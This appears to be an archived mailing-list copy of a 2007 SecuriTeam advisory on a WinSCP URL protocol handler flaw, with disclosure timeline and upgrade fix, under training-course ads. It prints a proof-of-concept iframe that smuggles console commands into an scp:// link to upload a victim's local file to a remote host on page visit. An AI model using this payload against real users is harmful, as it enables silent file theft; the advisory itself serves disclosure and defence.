Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Exploits-HackingTools
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

[NT] WinSCP URL Protocol Handler Flaw

from [SecuriTeam] Network Security [Permanent Link]
Subject: [NT] WinSCP URL Protocol Handler Flaw
Date: 16 Sep 2007 15:06:40 +0200 
The following security advisory is sent to the securiteam mailing list, and can 
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html 

- - - - - - - - -



  WinSCP URL Protocol Handler Flaw
------------------------------------------------------------------------


SUMMARY

By default WinSCP installs URL protocol handlers for the scp:// and 
sftp:// protocols. These could be used by malicious web content to 
automatically upload any file from the local system to a remote server, or 
automatically  download files from a remote server to the local system.

Since version 3.8.2 there is a sort of protection against this, but this 
does not stop all forms of attack.

DETAILS

Vulnerable Systems:
 * WinSCP version 4.0.3

Immune Systems:
 * WinSCP version 4.0.4

On a machine you control set up an scp-only account with the username 
"scp" with any password. Place this on a website: <iframe 
src='scp:password@yourhost.com:" /console /command "option confirm off" 
"put c:\boot.ini" close exit "'/>

This will upload a file to the server when the page is visited by a user 
with a vulnerable WinSCP installed.

Downloading a file from the server to any location writable by the current 
user also works.

Solution:
Upgrade to version 4.04 or higher from  <http://winscp.net/download.php> 
http://winscp.net/download.php

Disclosure Timeline
24-Jul-2007 Vulnerability reported to Martin Prikryl
25-07-2007 Proposed fix to Martin
31-07-2007 Response from Martin
01-09-2007 Martin confirms fix
02-09-2007 New version done
06-09-2007 WinSCP v4.04 released


ADDITIONAL INFORMATION

The information has been provided by  <mailto:Kender.Security@gmail.com> 
Kender.Security.



======================================== 


This bulletin is sent to members of the SecuriTeam mailing list. 
To unsubscribe from the list, send mail with an empty subject line and body to: 
list-unsubscribe@securiteam.com 
In order to subscribe to the mailing list, simply forward this email to: 
list-subscribe@securiteam.com 


==================== 
==================== 

DISCLAIMER: 
The information in this bulletin is provided "AS IS" without warranty of any 
kind. 
In no event shall we be liable for any damages whatsoever including direct, 
indirect, incidental, consequential, loss of business profits or special 
damages.
[More messages with this same subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • [NT] WinSCP URL Protocol Handler Flaw, SecuriTeam <=
Previous by Date:  [UNIX] Multiple Kerberos Implementations Authentication Context Stack Overflow Vulnerability, SecuriTeam
Next by Date:  [NEWS] GCALDaemon DoS, SecuriTeam
Previous by Thread:  [UNIX] Multiple Kerberos Implementations Authentication Context Stack Overflow Vulnerability, SecuriTeam
Next by Thread:  [NEWS] GCALDaemon DoS, SecuriTeam
Indexes:  [Date] [Thread] [Top] [All Lists]